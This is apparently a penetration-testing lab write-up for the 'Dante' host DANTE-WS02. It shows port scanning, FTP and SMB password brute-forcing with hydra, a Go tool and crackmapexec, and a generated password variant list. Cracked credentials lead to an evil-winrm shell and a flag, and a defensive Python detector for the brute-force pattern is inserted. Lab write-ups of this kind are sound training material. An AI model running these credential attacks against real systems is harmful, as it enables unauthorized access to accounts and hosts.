Rustscan

rustscan -a 172.16.1.101 --ulimit 5000 -- -Pn -sV --script vuln
Open 172.16.1.101:21
Open 172.16.1.101:139
Open 172.16.1.101:135
Open 172.16.1.101:445
Open 172.16.1.101:5040
Open 172.16.1.101:5985
Open 172.16.1.101:47001
Open 172.16.1.101:49665
Open 172.16.1.101:49667
Open 172.16.1.101:49664
Open 172.16.1.101:49669
Open 172.16.1.101:49666
Open 172.16.1.101:49670
Open 172.16.1.101:49668
PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack FileZilla ftpd
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
5040/tcp  open  unknown       syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-csrf: Couldn't find any CSRF vulnerabilities.
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

No success on anything; it might depend on another machine.

Found a passwords field in an xls file from dc01.

Hydra FTP brute force (too slow)

hydra -L users.txt -P pass.txt ftp://172.16.1.101

FTP brute forcer written in Go

git clone https://github.com/rix4uni/FTPBruteForce

Combine users.txt and pass.txt

paste -d: users.txt pass.txt > userpass.txt

Brute-forcing

go mod init ftp-brute-force.go
go mod tidy
go run ftp-brute-force-default-credentails.go -up ../userpass.txt -ip 172.16.1.101:21
Output
Trying asmith:Princess1
Trying smoggat:Summer2019
Trying tmodle:P45678!
Trying ccraven:Password1
Trying kploty:Teacher65
Trying jbercov:4567Holiday1
Trying whaguey:acb123
Trying dcamtan:WorldOfWarcraft67
Trying tspadly:RopeBlackfieldForwardslash
Trying ematlis:JuneJuly1TY
Trying fglacdon:FinalFantasy7
Trying tmentrso:65RedBalloons
Trying dharding:WestminsterOrange5
Successfully login with ip:172.16.1.101:21 username:dharding password:WestminsterOrange5

FTP login

ftp 172.16.1.101
dharding
 
ls
 
mget *

Found a login.txt file

Dido, I’ve had to change your account password due to some security issues we have recently become aware of

It’s similar to your FTP password, but with a different number (ie. not 5!)

Come and see me in person to retrieve your password.

thanks, James

Account password changed

This means we need to create a new password list for the user dharding and then brute-force it.

Creating a password list

for i in {1..50}; do echo "WestminsterOrange$i"; done > newpasslist.txt

Brute-forcing with crackmapexec

crackmapexec smb 172.16.1.101 -u 'dharding' -p newpasslist.txt 2>/dev/null
 
SMB         172.16.1.101    445    DANTE-WS02       [+] DANTE-WS02\dharding:WestminsterOrange17
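From the DANTE-WS02 side, the crackmapexec run above leaves a very recognisable trace: a burst of failed logons for one account from one source address, then a single success. The following Python is an added example (not part of this writeup or of any tool used in it) that detects that pattern over constructed authentication records; the source IP 10.10.14.5, the jbercov noise rows and all timestamps are made up for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real DANTE-WS02 logs). Each row is
# (timestamp, source IP, account, outcome): the fields a SIEM would extract
# from Windows events 4625/4624 (Logon Type 3) or from an FTP daemon's auth log.
SAMPLE_EVENTS = [
    (f"2024-01-01T10:00:{10 + 3 * i:02d}", "10.10.14.5", "dharding", "fail")
    for i in range(16)
] + [
    ("2024-01-01T10:01:00", "10.10.14.5", "dharding", "success"),
    ("2024-01-01T10:00:30", "172.16.1.50", "jbercov", "fail"),
    ("2024-01-01T10:02:00", "172.16.1.50", "jbercov", "fail"),
]


def parse_events(rows):
    """Turn raw rows into (datetime, src, user, outcome) tuples sorted by time."""
    parsed = [(datetime.fromisoformat(ts), src, user, out) for ts, src, user, out in rows]
    return sorted(parsed)


def detect_bruteforce(events, threshold=10, window=timedelta(minutes=5)):
    """Flag (src, user) pairs with >= threshold failures inside a sliding window.

    Returns {(src, user): (total_failures, success_after)}; success_after is True
    when a successful logon for that pair follows the flagged burst, which is the
    signature of a guessed password rather than a user mistyping.
    """
    fails = defaultdict(list)
    successes = defaultdict(list)
    for ts, src, user, outcome in events:
        (fails if outcome == "fail" else successes)[(src, user)].append(ts)

    alerts = {}
    for key, times in fails.items():
        start = 0
        for end, ts in enumerate(times):
            # Slide the window start forward until it covers at most `window`.
            while ts - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                success_after = any(s >= ts for s in successes.get(key, []))
                alerts[key] = (len(times), success_after)
    return alerts
```

Tune `threshold` and `window` to the environment: a 50-entry list like newpasslist.txt above completes in seconds, so a short window with a low threshold catches it without flagging ordinary typos.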

Looking for the shares

crackmapexec smb 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17' --shares 2>/dev/null
 
SMB         172.16.1.101    445    DANTE-WS02       Share           Permissions     Remark
SMB         172.16.1.101    445    DANTE-WS02       -----           -----------     ------
SMB         172.16.1.101    445    DANTE-WS02       ADMIN$                          Remote Admin
SMB         172.16.1.101    445    DANTE-WS02       C$                              Default share
SMB         172.16.1.101    445    DANTE-WS02       IPC$            READ            Remote IPC

Checking WinRM with crackmapexec

crackmapexec winrm 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17' 2>/dev/null
SMB         172.16.1.101    5985   DANTE-WS02       [*] Windows 10.0 Build 18362 (name:DANTE-WS02) (domain:DANTE-WS02)
HTTP        172.16.1.101    5985   DANTE-WS02       [*] http://172.16.1.101:5985/wsman
WINRM       172.16.1.101    5985   DANTE-WS02       [+] DANTE-WS02\dharding:WestminsterOrange17 (Pwn3d!)

Logging into WinRM

evil-winrm -i 172.16.1.101 -u 'dharding' -p 'WestminsterOrange17' /domain:dante.local

Flag

*Evil-WinRM* PS C:\Users\dharding\Desktop> cat flag.txt
 
DANTE{superB4d_p4ssw0rd_FTW}

Priv Esc